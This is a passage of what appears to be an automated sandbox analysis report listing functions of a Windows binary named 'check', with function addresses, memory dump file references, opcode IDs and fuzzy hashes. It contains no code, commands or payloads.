                                                                                                                                                                                                                                          • String ID: TMP
                                                                                                                                                                                                                                          • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                          • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                          • Instruction ID: 0bec1140f4b94b5a3140369bef97ee07ccb8bc02469f7e460c810b4d9feb52c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC519311F08E0241FA64BE265D8997AD2906F44BF4FC849B4DE1E477D6FEBCE409C228
                                                                                                                                                                                                                                          Function 00007FF712513480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                          • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                          • Instruction ID: 2f0d687c7cb8aed91813a695693673529b6dfecb1c04f39ae7a39b1967f45a5d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BB09220F0BE42D2EA083F216CC221862A47F48721FD801B8C41D80331EEAC60ED9720
                                                                                                                                                                                                                                          Function 00007FF7125035A0 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                          • Instruction ID: 3398e09ee2708cebb3effb3c57c3fe50f6c1578f2674a7823729618e7ab24636
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6D1FC22E08E4255EB68AF25C88023EA790EF05B68F940275CD0D077D6EFBDE94DC758
                                                                                                                                                                                                                                          Function 00007FF7124F9800 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                          • Instruction ID: 70d64a2c25c63d01f6b7fbc77a3f2873553a353234ae53250c5d7a1937fb7c75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC17D762181E08BD28AEB29E86947A73E1F7C930DBD5406BEF8747785C73CA514DB20
                                                                                                                                                                                                                                          Function 00007FF712502C10 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                          • Instruction ID: 19f59d9506825182303f38c2b98d22e3c859c68576e33b942ecffa2175ade4ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4B1B172508F4185EB649F39C89013CBBA0F745BA8FA80176CA4E87395EFB9D845C768
                                                                                                                                                                                                                                          Function 00007FF71250E570 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                          • Instruction ID: 52226b601c66be0629b1e5fb8ad2cc09b3d4cc4f97164c7bfc83b7bcbfae88db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5081F672A0CB8146E774DF19A88037AB691FB457A4FA04275DB8D43B89EF7CE408DB14
                                                                                                                                                                                                                                          Function 00007FF712516418 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                                          • Instruction ID: 113eed16d955efc466ff3a11aa8feeabef00591af83137db4ae5e28fa36e99c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5610862F08A524AFB64AE2894D063DE680AF41770FD502B9D71D43AC5EEEDEC48C730
                                                                                                                                                                                                                                          Function 00007FF712502164 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                          • Instruction ID: 832e1788fe312f80baffc6314cb31e4eaaab8f92d3f467a5ca40a00845917235
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A51A736A18E5281E7649F29C880238B3A1FB58BB8F644171CE4D87794EF7AEC47C754
                                                                                                                                                                                                                                          Function 00007FF712501944 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                          • Instruction ID: 643b3da7e17d8907b81654791d86f809596ddf69e6c26f280fccfb1a64ee90c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A451A836E18E5186E7249F29C480238B7A0EB44B78F64C171CE8D17794EF7AE847C7A5
                                                                                                                                                                                                                                          Function 00007FF712501D54 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                          • Instruction ID: de049eba8cc11e3581a3eb5bbbbedf678ff94b9f81a08dfaa9297ee6b68452b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1551C277A18E5182E7249F29C48023CB7A0EB45B78F648171CE4D07794EBBAE847C759
                                                                                                                                                                                                                                          Function 00007FF712501B50 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                          • Instruction ID: 458bd953536f1b24d4b32c45a65abf7d1fa060b149842d9708973e11b553bd5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE51B336A18E5182E7249F29C880338B7A1EB45B78FA4C171CE4C17794EFBAE847C755
                                                                                                                                                                                                                                          Function 00007FF712501F60 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                          • Instruction ID: bb3942bdf9620b2adc2b6cfc74bcdb975baeaf681e3ae62258d581c30f2c6f69
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E251F636A18E5181E7249F29C89023CB3A1EB44FA8F648071CE4C47799EF7AEC47C764
                                                                                                                                                                                                                                          Function 00007FF712501740 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                          • Instruction ID: 4efa32f84eaac5897f49cbccca7ba225b68ac8e772500d3dd9bd34954ba9aae5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F51C536A18E5181E7249F29C480338B7A0EB44B78FA48171CE4C17795EF7AE947C759
                                                                                                                                                                                                                                          Function 00007FF712505D30 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                          • Instruction ID: 245d4cee65dcc1798c50b582ac5fcda3a775d916f4d7cb6af4661d764f9b99d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B441D563809F4B05E9999D181C886B49A80BF127B8DD812F5DDDD173C3EC4D6A8FC224
                                                                                                                                                                                                                                          Function 00007FF712509EA0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                          • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                          • Instruction ID: 8ec35e2f2a220c412bfe446222eb7c0aa0477a172d05a5adadbc7c897b367bde
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5410262714E5582EF04DF2AD9A4579B3A1BB48FE0B899432EE0D97B58EE7CD046C304
                                                                                                                                                                                                                                          Function 00007FF7125080E4 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                          • Instruction ID: baff752426d368fcbf43071b284048bb05aa1fc67d55427855d756fe18a4c308
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
